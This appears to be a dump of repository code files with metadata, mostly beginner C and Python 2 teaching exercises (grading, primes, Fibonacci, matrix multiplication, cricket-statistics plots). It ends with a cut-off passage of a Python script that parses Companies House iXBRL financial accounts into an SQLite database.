\t\t\t\t\t\t\n\t\t\t\t\t\t\n\texcept:\n\t print run\n pass\n\t\t\n return records,max_run\n\ndef initialize(players):\n records={}\n for player in players:\n records[player]={}\n records[player][\"runs\"]=[]\n return records\n\n\n\ndef calculate_cdf(records, player):\n\n sm=len(records[player][\"runs\"])\n for run in records[player][\"runs\"]:\n records[player][\"count\"][run]+=1\n \n cdf=[]\n prev=0.0\n\n for i in range(len(records[player][\"count\"])):\n prob=(records[player][\"count\"][i] / sm) + prev\t\n prev=prob\n cdf.append(prob)\n return cdf\n\n\ndef graph(players, records):\n index=0\n for player in players:\n \n dist=calculate_cdf(records, player)\n line=(plt.plot(range(len(dist)),dist))\n mc=marker_color[index]\n stl=lnst[index]\n mk=marks[index]\n\t\t\t\t\t\n \n plt.setp(line,color=mc,linewidth=3,ls=stl)\n index+=1\n for label in ax.get_xticklabels():\n label.set_fontsize(17)\n for label in ax.get_yticklabels():\n label.set_fontsize(17)\n #ax.set_ylim(0, 1.05)\n #ax.set_xlim(0, 70)\n plt.title(\"Mushfiq VS Tamim VS Kohli\",fontsize=20)\n plt.xlabel(\"Runs\",fontsize=18)\n plt.ylabel(\"CDF\",fontsize=18)\n\n\n\n plt.grid(True)\n\n\n plt.legend(players,loc=0,fontsize=20)\n plt.show()\n\n\nif __name__==\"__main__\":\n\n players=[\"mushfiq\", \"tamim\", \"kohli\"]\n \n years=[\"2015\",\"2016\",\"2017\",\"2018\",\"2019\"]\n \n records = initialize(players)\n records,max_run = collect_runs(records,years)\n for player in records:\n\trecords[player][\"count\"]=[0.0]*(max_run+1)\n\n #print sorted(records[\"mushfiq\"][\"runs\"])\n #print len(records[\"tamim\"][\"runs\"])\t\n graph(players, records)\n \n\n\n \t \t\n" }, { "alpha_fraction": 0.5838150382041931, "alphanum_fraction": 0.5953757166862488, "avg_line_length": 9.75, "blob_id": "121ce35b6bc53ee8e0537e7f8e243026263840af", "content_id": "5dbcdf13fc1bf9a5445ca9a6f3a928d9dbff91f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 24, "num_lines": 16, "path": "/python/week-4/calculator/calculation.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "def add(a,b):\n\treturn a+b\n\ndef subtract(a,b):\n\treturn a-b\n\ndef multiply(a,b):\n\treturn a*b\n\ndef division(a,b):\n\treturn a/b\n\n\nif __name__==\"__main__\":\n\tsm=add(5,2)\n\tprint sm\n\n" }, { "alpha_fraction": 0.6357142925262451, "alphanum_fraction": 0.6452381014823914, "avg_line_length": 15.115385055541992, "blob_id": "285b3019fbdbdf76632033f307738337e7cad357", "content_id": "32af96b6eeaeacc14069ca02e69a6731efa6831d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 420, "license_type": "no_license", "max_line_length": 29, "num_lines": 26, "path": "/python/week-2/test.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "\ndef avg(ls):\n\tsm=0.0\t\n\tfor i in range(len(ls)):\n\t\tsm+=ls[i]\n\treturn sm/len(ls)\t\n\nfr=open(\"sample.txt\",\"r\")\n\n#### read the header ####\nfr.readline()\n\nlines=fr.readlines()\nplayers={}\nfor line in lines:\n\tline=line.strip()\n\tdata=line.split(\"\\t\")\n\tpl=data[0]\n\trun=float(data[1])\n\tif pl not in players:\n\t\tplayers[pl]=[]\n\n\tplayers[pl].append(run)\t\n\t\nfor player in players:\n\taverage=avg(players[player])\n\tprint player, average\n" }, { "alpha_fraction": 0.3006211221218109, "alphanum_fraction": 0.31677019596099854, "avg_line_length": 16.866666793823242, "blob_id": 
"6fae252c9b19c3d27b1390b2e79f94bb7a9be42e", "content_id": "1fe19fe83000ee0752798b81ea4da4546c2d3805", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 805, "license_type": "no_license", "max_line_length": 92, "num_lines": 45, "path": "/week-2/grading.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nA simple C program for a simple grading system. This program can be done in many other ways\n\n*/\n\n#include<stdio.h>\n\n\nint main(){\n int mark;\n printf(\"Enter your mark: \");\n scanf(\"%d\",&mark);\n\n if(mark >100 || mark <0){\n printf(\"Invalid input\");\n }\n else{\n if(mark>=80){\n printf(\"A+\");\n }\n else{\n if(mark>=70){\n printf(\"A\");\n }\n else{\n if(mark>=50)\n {\n printf(\"B\");\n }\n else{\n if(mark >=33){\n printf(\"C\");\n }\n else{\n printf(\"F\");\n }\n }\n\n }\n }\n\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7111111283302307, "avg_line_length": 14, "blob_id": "7903b773f854c787bfb8e6b4ff33e9cfe726b036", "content_id": "15a8446a4fa0fbe27915bb281a83cf2a4fb02d4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/python/week-4/matplot.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\n\nprint \"***\"\n" }, { "alpha_fraction": 0.2745535671710968, "alphanum_fraction": 0.3549107015132904, "avg_line_length": 11.416666984558105, "blob_id": "5a0743f3b838fc3c2d55fff4017a786df9ff6bfc", "content_id": "d0139c460c5740f84fae8e70b8447e570ddf2a5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 448, "license_type": "no_license", "max_line_length": 35, "num_lines": 36, "path": "/week-5/2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nsample:\nn=5\n\n 1\n 131\n 13531\n 1357531\n135797531\n\n*/\n\n#include<stdio.h>\n\nint main()\n{\n int i,j,k,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=1;i<=n;i++){\n for(j=1;j<=n-i;j++){\n printf(\" \");\n }\n for(j=1;j<=(2*i)-1;j+=2){\n printf(\"%d\",j);\n }\n\n for(k=j-4;k>=1;k-=2){\n printf(\"%d\",k);\n }\n printf(\"\\n\");\n }\n\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.48202958703041077, "alphanum_fraction": 0.4947145879268646, "avg_line_length": 17.7227725982666, "blob_id": "17d6ca264f49a836331a54215c7d2c2356631196", "content_id": "3910211032f239631ac4dec56e8f4c8921f547f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 56, "num_lines": 101, "path": "/week-9/project.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nSkeleton for a fake telephone book software\n*/\n\n\n#include<stdio.h>\n#include<string.h>\n#define SIZE 1000\n\nint options();\nvoid insert();\nvoid delete_person();\nvoid update();\nvoid show();\nvoid search();\n\nint ind=0;\nstruct person{\n int age;\n char name[50];\n char phone[30];\n}contact[SIZE];\n\nint options(){\n int option;\n char c;\n printf(\"###################\\n\");\n printf(\"Insert: 1\\n\");\n printf(\"Delete: 2\\n\");\n printf(\"Update: 3\\n\");\n printf(\"Search: 4\\n\");\n printf(\"Show: 5\\n\");\n printf(\"Exit: 6\\n\");\n printf(\"###################\\n\");\n printf(\"Selection an option:\");\n scanf(\"%d\",&option);\n 
//this is to read the tangling new line\n scanf(\"%c\",&c);\n if(option==1)\n insert();\n else if(option==2)\n delete_person();\n else if(option==3)\n update();\n else if(option==4)\n search();\n else if(option==5)\n show();\n else if (option == 6)\n return 0;\n}\n\nvoid insert(){\n char c;\n printf(\"\\n\\n#######################\\n\");\n printf(\"Enter name:\");\n scanf(\"%[^\\n]\",contact[ind].name);\n printf(\"Enter age:\");\n scanf(\"%d\",&contact[ind].age);\n scanf(\"%c\",&c);\n printf(\"Enter phone number:\");\n scanf(\"%[^\\n]\",contact[ind].phone);\n ind++;\n printf(\"#######################\\n\");\n options();\n}\n\nvoid delete_person(){\n printf(\"I am delete\\n\");\n options();\n}\nvoid update(){\n printf(\"I am update\\n\");\n options();\n}\n\nvoid search(){\n printf(\"I am search\\n\");\n options();\n}\n\nvoid show(){\n int i;\n printf(\"\\n\\n####################\\n\\n\");\n for(i=0;i<ind;i++){\n printf(\"Name: %s\\n\",contact[i].name);\n printf(\"Age: %d\\n\",contact[i].age);\n printf(\"Phone number: %s\\n\\n\",contact[i].phone);\n }\n options();\n}\n\nvoid exit(){\n printf(\"I am exit\\n\");\n options();\n}\n\nint main(){\n options();\n return 0;\n}\n\n" }, { "alpha_fraction": 0.48170730471611023, "alphanum_fraction": 0.5152438879013062, "avg_line_length": 14.571428298950195, "blob_id": "e914a143e7e4855439824f35e76ba7eb0075e215", "content_id": "d88e47f20ac87fa1e7acdd1ba990833a6b9b01cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 328, "license_type": "no_license", "max_line_length": 54, "num_lines": 21, "path": "/week-2/leap-year.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nA simple C program for checking leap year\n*/\n\n#include<stdio.h>\n\nint main(){\n\n int year;\n printf(\"Enter the year: \");\n scanf(\"%d\",&year);\n\n if(year%4==0 && ((year%100!=0) || (year%400==0))){\n printf(\"This is a leap year\");\n }\n else{\n printf(\"This is not a leap year\");\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.6126629710197449, "alphanum_fraction": 0.6890130639076233, "avg_line_length": 20.479999542236328, "blob_id": "fb50f0f51dd72e29ec1bd8b49f32f7fd5029c1fa", "content_id": "72f93feda9a989f1eefc4436d6b8e70eaaedcf5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "no_license", "max_line_length": 44, "num_lines": 25, "path": "/python/week-4/line_graph.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nx=[1,2,3,4,5]\ny=[10,20,6,100,10000]\n\n\nline = plt.plot(x,y)\nplt.setp(line,color=\"b\",linewidth=3,ls=\"--\",\nmarker=\"D\",markersize=\"10\")\nfor label in ax.get_xticklabels():\n\t\tlabel.set_fontsize(20)\nfor label in ax.get_yticklabels():\n \t\tlabel.set_fontsize(20)\n\nplt.title(\"Test graph\",fontsize=18)\nplt.xlabel(\"Some x values\",fontsize=18)\nplt.ylabel(\"Some Y values\",fontsize=18)\nplt.grid(True)\n\n#ax.set_ylim(6, 1000)\n#ax.set_xlim(1, 5)\nax.set_yscale('log')\nplt.show()\n" }, { "alpha_fraction": 0.4570637047290802, "alphanum_fraction": 0.48476454615592957, "avg_line_length": 14.65217399597168, "blob_id": "89daa0d0fa198616a1ebd91e64b08cbd23fda885", "content_id": "1446da478ba16b0a34526b4b49bf6c3b0377a939", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 361, "license_type": "no_license", "max_line_length": 39, 
"num_lines": 23, "path": "/week-5/3.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nReverse a number without leading zeros.\n*/\n#include<stdio.h>\n\nint main()\n{\n int remainder, track=0, n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n while(n!=0){\n\n remainder=n%10;\n n=n/10;\n if (remainder==0 && track==0){\n continue;\n }\n track=1;\n printf(\"%d\", remainder);\n }\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.36624205112457275, "alphanum_fraction": 0.3980891704559326, "avg_line_length": 13.904762268066406, "blob_id": "e3f5c7b7e34aa46bb321f8461852cacaad5c763c", "content_id": "6768ba6f8217ab6933d1ca2dc945b8b1a02da31a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 314, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/week-3/p1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/* 3n+1 problem\n*/\n#include<stdio.h>\nint main(){\n int steps=0, n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n while(n!=1){\n steps++;\n if(n%2==0){\n n=n/2;\n }\n else{\n n=3*n+1;\n }\n\n }\n\n printf(\"Number of steps=%d\",steps);\n return 0;\n}\n\n" }, { "alpha_fraction": 0.4015151560306549, "alphanum_fraction": 0.4583333432674408, "avg_line_length": 10.954545021057129, "blob_id": "0f397c25fbed5c3e3e65f6a5d9c14903f1f31d60", "content_id": "7fa2b835d900c21bc24236333b1d995501b62456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 264, "license_type": "no_license", "max_line_length": 31, "num_lines": 22, "path": "/week-5/4_2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFinding nth fibonacci number\n*/\n#include<stdio.h>\n\nint main()\n{\n int f1=1,f2=0,f3, i,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n\n for(i=1;i<=n;i++){\n f3=f1+f2;\n f1=f2;\n f2=f3;\n }\n printf(\"%d\",f3);\n\n\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.3787234127521515, "alphanum_fraction": 0.4234042465686798, "avg_line_length": 15.75, "blob_id": "81507d09d1603164db7cdf6c73c0a292bceb2220", "content_id": "94f57d2bce1d1555c7c2bce3deec65df8f08c065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 470, "license_type": "no_license", "max_line_length": 35, "num_lines": 28, "path": "/week-4/4.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nPrint all the prime numbers up to n\nsample input:\nn=20\nsample output:\n2 3 5 7 11 13 17 19\n*/\n#include<stdio.h>\n#include<math.h>\nint main(){\n int i,j,n,track;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=2;i<=n;i++){\n track=0;\n for(j=2;j<=sqrt(i);j++){\n\n if(i%j==0){\n track=1;\n break;\n }\n }\n if(track==0){\n printf(\"%d \",i);\n }\n }\n return 0;\n}\n\n" }, { "alpha_fraction": 0.7319587469100952, "alphanum_fraction": 0.7731958627700806, "avg_line_length": 15.166666984558105, "blob_id": "e280d1cf3581a6bff6773ea7549e73333db60a29", "content_id": "0dbed52a67e81742fafb02f705590fc2a424bffc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/python/week-4/main.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import calculator.calculation as cal\n\nsm=cal.add(5,6)\nprint sm\nmult=cal.multiply(5,6)\nprint mult\n" }, { "alpha_fraction": 
0.6772777438163757, "alphanum_fraction": 0.688803493976593, "avg_line_length": 20.186046600341797, "blob_id": "4c5991984fa3f3e5c29040549a6abaf8629de7c3", "content_id": "bee4b57c02034207ae906e91285ab4a95176b585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 57, "num_lines": 86, "path": "/python/week-2/program.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nfr=open(\"stats/bangladesh/tamim/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\ntamim_years=[]\ntamim_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\ttamim_years.append(int(year))\n\t\ttamim_avgs.append(float(avg))\n\n\nfr=open(\"stats/bangladesh/mushfiq/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\nmushfiq_years=[]\nmushfiq_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\tmushfiq_years.append(int(year))\n\t\tmushfiq_avgs.append(float(avg))\n\nfr=open(\"stats/bangladesh/mahmudullah/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\nmahmud_years=[]\nmahmud_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\tmahmud_years.append(int(year))\n\t\tmahmud_avgs.append(float(avg))\n\nfr=open(\"stats/india/kohli/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\nkohli_years=[]\nkohli_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\tkohli_years.append(int(year))\n\t\tkohli_avgs.append(float(avg))\n\n\n\nplt.plot(tamim_years, tamim_avgs, ls=\"--\")\nplt.plot(mushfiq_years, mushfiq_avgs, ls =\"-\")\nplt.plot(mahmud_years, mahmud_avgs, ls =\":\")\nplt.plot(kohli_years, kohli_avgs, ls =\"-.\")\n\nplt.xlabel('Year',fontsize=18)\nplt.ylabel('Average runs',fontsize=18)\nplt.legend(('Tamim', 'Mushfiq', 'Mahmudullah', 'Kohli'))\n\nleg = plt.gca().get_legend()\nltext = leg.get_texts()\nplt.setp(ltext, fontsize=20)\n\nfor label in ax.get_xticklabels():\n\tlabel.set_fontsize(14)\nfor label in ax.get_yticklabels():\n\tlabel.set_fontsize(15)\n\nplt.show()\n" }, { "alpha_fraction": 0.45126354694366455, "alphanum_fraction": 0.4909747242927551, "avg_line_length": 13.526315689086914, "blob_id": "8f32e0ce2af5b86dbfd3d9d53552506ea4844185", "content_id": "5c17e59f988f64f49b4b9d5c797bed14b2517945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 277, "license_type": "no_license", "max_line_length": 43, "num_lines": 19, "path": "/week-3/p4.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/* for n=5\noutput: 1 3 6 10 15\n\nDon't worry if you could not solve it yet. 
\n\n*/\n#include<stdio.h>\nint main(){\n int i, n, sum=0;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n\n for(i=1;i<=n;i++){\n sum=sum+i;\n printf(\"%d \",sum);\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.39840638637542725, "alphanum_fraction": 0.42031872272491455, "avg_line_length": 14.181818008422852, "blob_id": "ab078afd657fa5d7f1f8f0cc6e2aabc8ece9162e", "content_id": "b7c9d0fbbbad9b801bbc5ed8147bcd37f8d56a8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 502, "license_type": "no_license", "max_line_length": 43, "num_lines": 33, "path": "/week-6/p2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nCounting individual numbers\n*/\n\n#include<stdio.h>\n\nint main(){\n int n, a[20], count[20], i, number;\n printf(\"How many numbers?: \");\n scanf(\"%d\",&n);\n printf(\"Enter %d numbers \", n);\n\n for(i=0;i<n;i++){\n scanf(\"%d\",&a[i]);\n }\n\n for(i=0;i<n;i++){\n count[i]=0;\n }\n\n for(i=0;i<n;i++){\n number=a[i];\n count[number]++;\n }\n\n for(i=0;i<n;i++){\n if(count[i]>0){\n printf(\"%d = %d\\n\",i,count[i]);\n }\n }\n return 0;\n\n}\n\n" }, { "alpha_fraction": 0.3489736020565033, "alphanum_fraction": 0.3988269865512848, "avg_line_length": 12.600000381469727, "blob_id": "8344a6d7c3fe59ee546bd2ff7a3437849d0639ee", "content_id": "fcd88f770e6096fdf32819df113d912fa442b184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 341, "license_type": "no_license", "max_line_length": 31, "num_lines": 25, "path": "/week-5/4_1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFinding nth fibonacci number\n*/\n#include<stdio.h>\n\nint main()\n{\n int f1=1,f2=1,f3, i,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n if(n<=2){\n printf(\"1\");\n }\n else{\n for(i=3;i<=n;i++){\n f3=f1+f2;\n f1=f2;\n f2=f3;\n }\n printf(\"%d\",f3);\n }\n\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.42465752363204956, "alphanum_fraction": 0.4292237460613251, "avg_line_length": 11.485713958740234, "blob_id": "6a36831ab88efc25408e03a0ba854c655bc88d21", "content_id": "f5974048463a41c76196362ebf30d21738263e54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 438, "license_type": "no_license", "max_line_length": 34, "num_lines": 35, "path": "/week-5/5.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nGCD and LCM of two numbers\n\n*/\n#include<stdio.h>\n\nint main()\n{\n int max, min,x,y, tmp,lcm;\n printf(\"Enter two numbers: \");\n scanf(\"%d%d\",&x,&y);\n\n if(x<y){\n min=x;\n max=y;\n }\n\n else{\n min=y;\n max=x;\n }\n\n while(min!=0){\n tmp=min;\n min=max%min;\n max=tmp;\n }\n\n lcm = (x*y)/max;\n\n printf(\"GCD is: %d\\n\", max);\n printf(\"LCM is: %d\", lcm);\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.3624577224254608, "alphanum_fraction": 0.39515221118927, "avg_line_length": 21.443037033081055, "blob_id": "33df21ef0a03e1b3ebcf972185fb170a2c1cd1ed", "content_id": "f97f8c9d80cf414981da209926ceac0043850676", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1774, "license_type": "no_license", "max_line_length": 72, "num_lines": 79, "path": "/week-9/1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nmatrix multiplication\n*/\n\n#include<stdio.h>\n\nint main(){\n int a[20][20],b[20][20],c[20][20],i,j,k,sum, row1, col1, row2, col2;\n 
printf(\"Number of rows for matrix 1:\");\n scanf(\"%d\",&row1);\n printf(\"Number of columns for matrix 1:\");\n scanf(\"%d\",&col1);\n printf(\"\\n\\nNumber of rows for matrix 2:\");\n scanf(\"%d\",&row2);\n printf(\"Number of columns for matrix 2:\");\n scanf(\"%d\",&col2);\n if(col1!=row2){\n printf(\"Matrix multiplication is not possible\");\n }\n else{\n printf(\"\\nEnter the first matrix (%d*%d)\\n\",row1,col1);\n for(i=0;i<row1;i++){\n for(j=0;j<col1;j++){\n scanf(\"%d\",&a[i][j]);\n }\n\n }\n printf(\"\\nEnter the second matrix (%d*%d)\\n\",row2,col2);\n\n for(i=0;i<row2;i++){\n for(j=0;j<col2;j++){\n scanf(\"%d\",&b[i][j]);\n }\n\n }\n\n //we start the multiplication now\n for(i=0;i<row1;i++){\n for(j=0;j<col2;j++){\n sum=0;\n for(k=0;k<col1;k++){\n sum+=a[i][k]*b[k][j];\n }\n c[i][j]=sum;\n }\n\n }\n\n printf(\"\\nThe first matrix is:\\n\");\n\n for(i=0;i<row1;i++){\n for(j=0;j<col1;j++){\n printf(\"%d \",a[i][j]);\n }\n printf(\"\\n\");\n }\n\n printf(\"\\nThe second matrix is:\\n\");\n\n for(i=0;i<row2;i++){\n for(j=0;j<col2;j++){\n printf(\"%d \",b[i][j]);\n }\n printf(\"\\n\");\n\n }\n\n printf(\"\\nThe result is:\\n\");\n\n for(i=0;i<row1;i++){\n for(j=0;j<col2;j++){\n printf(\"%d \",c[i][j]);\n }\n printf(\"\\n\");\n }\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.3360433578491211, "alphanum_fraction": 0.39024388790130615, "avg_line_length": 10.5, "blob_id": "23e7a4fc66c52300f2384da655362bd0b0c6bac2", "content_id": "263088299de10255868b4d37eb713f81df8886b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 369, "license_type": "no_license", "max_line_length": 31, "num_lines": 32, "path": "/week-4/2_reverse.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nsample input:\nn=5\nsample output:\n\n55555\n 4444\n 333\n 22\n 1\n\n\n*/\n#include<stdio.h>\nint main(){\n int i,j,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=n;i>=1;i--){\n\n for(j=1;j<=n-i;j++){\n printf(\" \");\n }\n for(j=1;j<=i;j++){\n printf(\"%d\",i);\n\n }\n printf(\"\\n\");\n\n }\n return 0;\n}\n\n" } ]
31
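Several files in this record (tmp2.py and final_cdf_bd_players.py) build an empirical CDF by counting occurrences and accumulating probabilities. A cleaned-up Python 3 sketch of that calculation — the sample list mirrors tmp2.py, everything else is illustrative:

values = [10, 20, 1, 1, 0, 5, 5, 6, 7, 10]

# histogram: counts[i] is how often the value i occurs
counts = [0] * (max(values) + 1)
for v in values:
    counts[v] += 1

# cumulative distribution: cdf[i] approximates P(X <= i)
cdf, running = [], 0.0
for c in counts:
    running += c / len(values)
    cdf.append(running)

print(cdf[10])  # fraction of values <= 10
print(cdf[-1])  # ends at 1.0, up to floating-point rounding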
DIT-Data/coho_accounts
https://github.com/DIT-Data/coho_accounts
06b6c6304958b40957c043c49d1085cac582c653
baccb22a0801e57db5bed0bfe8b5d075485fbf27
934051889b5d969090a13d8534dfee6cabafc6ed
refs/heads/master
2020-04-07T13:37:23.302924
2019-01-14T15:08:29
2019-01-14T15:08:29
158,414,511
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.581404447555542, "alphanum_fraction": 0.5908199548721313, "avg_line_length": 37.621212005615234, "blob_id": "ae4c763c01132bf4bb8249476461b927c254eb11", "content_id": "55ecf4dcd484a50f26f9407119f7c3a012d381e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5100, "license_type": "no_license", "max_line_length": 116, "num_lines": 132, "path": "/run_xbrli.py", "repo_name": "DIT-Data/coho_accounts", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport os\nimport pandas as pd\nfrom datetime import datetime\nimport sqlalchemy\nimport shutil\n\ndef add_column(engine, table_name, column):\n column_name = column.compile(dialect=engine.dialect)\n column_type = column.type.compile(engine.dialect)\n engine.execute('ALTER TABLE %s ADD COLUMN %s %s' % (table_name, column_name, column_type))\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s %s/%s' % (prefix, bar, percent, suffix, iteration, total), end = '', flush=True)\n # Print New Line on Complete\n if iteration == total:\n print()\n\n# Getting directory names\ninput_dir = \"input/\"\ncomplete_dir = \"complete/\"\ncurrent_dir = os.getcwd()\n\n# Create or connect to Database\ndb = sqlalchemy.create_engine(r'sqlite:///'+current_dir+'/chfin.db', echo=False)\n\n# Counters for progress bar\ni = 0\nl = len(os.listdir(input_dir))\n\n# Initialize progressbar\nprintProgressBar(0, l)\nfor filename in os.listdir(input_dir):\n # Update progress bar once every 100 files\n if i % 100 == 0:\n printProgressBar(i + 1, l)\n i += 1\n\n # Extracting date and companies house number\n day = filename[-7:-5]\n month = filename[-9:-7]\n year = filename[-13:-9]\n chn = filename[-22:-14]\n\n # Opening file and looping through figures available\n soup = BeautifulSoup(open(\"%s%s\" % (input_dir, filename), encoding='utf-8'), \"html.parser\")\n figures = soup.find_all(name=\"ix:nonfraction\")\n out_dict = {}\n\n # Fixing Column Name and changing format of figures\n\n for fig in figures:\n tag_name = fig[\"name\"].split(\":\")[-1]\n contextref = fig[\"contextref\"]\n context = soup.find(name=\"xbrli:context\", id=contextref)\n if context is not None:\n\n end_date = context.find(name=\"xbrli:instant\")\n start_date = None\n if end_date is None:\n start_date = context.find(name=\"xbrli:startdate\").text\n end_date = context.find(name=\"xbrli:enddate\").text\n else:\n end_date = end_date.text\n\n out_dict.setdefault(end_date, {})\n if start_date is not None:\n out_dict[end_date].setdefault(\"start_date\", [start_date])\n out_dict[end_date].setdefault(\"end_date\", [end_date])\n\n segment = context.find(name=\"xbrli:segment\")\n key_name = tag_name\n if segment is not None:\n segment_text = segment.getText().split(\":\")[-1]\n key_name = tag_name + \":\" + segment_text\n\n # 
Multiplying by scale and check if value should be negative\n multiplier = 1\n if fig.has_attr('sign'):\n if fig['sign'] == \"-\":\n multiplier = -1\n if fig.has_attr('scale'):\n if int(fig['scale']) > 0:\n multiplier = multiplier * (10 ** int(fig['scale']))\n print(filename)\n # if fig.has_attr('decimals'):\n # if fig['decimals'] == \"INF\":\n # multiplier = multiplier * 0.01\n value = float(fig.text.replace(',', '').replace('-', \"0\"))\n out_dict[end_date].setdefault(key_name, [\"\"])[0] = value * multiplier\n\n # # Removing additional entries, only including current and previous year figures\n # for key in out_dict:\n # out_dict[key] = out_dict[key][:2]\n\n # Adding Companies house number and filename to pandas df for reference. Adding any missing columns to sql table\n # and appending dataframe to sql db.\n for key in out_dict:\n out_pd = pd.DataFrame.from_dict(out_dict[key], orient='columns')\n out_pd[\"chn\"] = chn\n out_pd[\"file_name\"] = filename\n\n # 